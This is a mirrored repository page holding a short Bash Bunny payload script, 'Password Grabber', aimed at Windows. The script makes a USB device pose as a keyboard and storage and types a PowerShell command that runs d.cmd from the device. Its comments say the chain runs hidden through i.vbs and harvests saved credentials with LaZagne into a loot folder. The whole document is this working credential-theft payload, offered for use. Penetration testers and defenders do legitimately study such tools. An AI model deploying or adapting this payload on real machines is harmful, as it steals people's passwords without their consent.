mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
20 lines
627 B
Bash
20 lines
627 B
Bash
#!/bin/bash
|
|
#
|
|
# Title: Password Grabber
|
|
# Author: Razerblade
|
|
# Version: 1.2
|
|
# Target: Windows
|
|
# Props: Hak5Darren, TeCHemically, dragmus31
|
|
# Category: Credentials
|
|
#
|
|
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
|
|
# which in turn executes e.cmd invisibly using i.vbs
|
|
# which in turn steals credentials by using LaZagne and saves them to /Loot
|
|
#
|
|
LED SETUP
|
|
GET SWITCH_POSITION
|
|
LED ATTACK
|
|
ATTACKMODE HID STORAGE
|
|
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
|
|
LED FINISH
|